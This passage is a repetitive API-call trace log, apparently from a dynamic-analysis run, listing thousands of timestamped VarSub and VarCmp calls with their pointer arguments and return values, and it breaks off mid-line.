VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.995] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.995] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.995] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.996] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.996] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.996] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.997] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.997] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.997] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.998] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.998] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.998] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.998] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.999] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.999] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.999] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0115.000] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0115.000] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0115.000] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.000] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0115.000] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.000] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.001] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.002] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.003] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.003] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.003] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.003] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.014] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.014] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.014] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.014] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.014] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.014] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.014] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.014] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.014] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.014] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.014] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.014] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.014] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.014] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.015] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0115.016] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 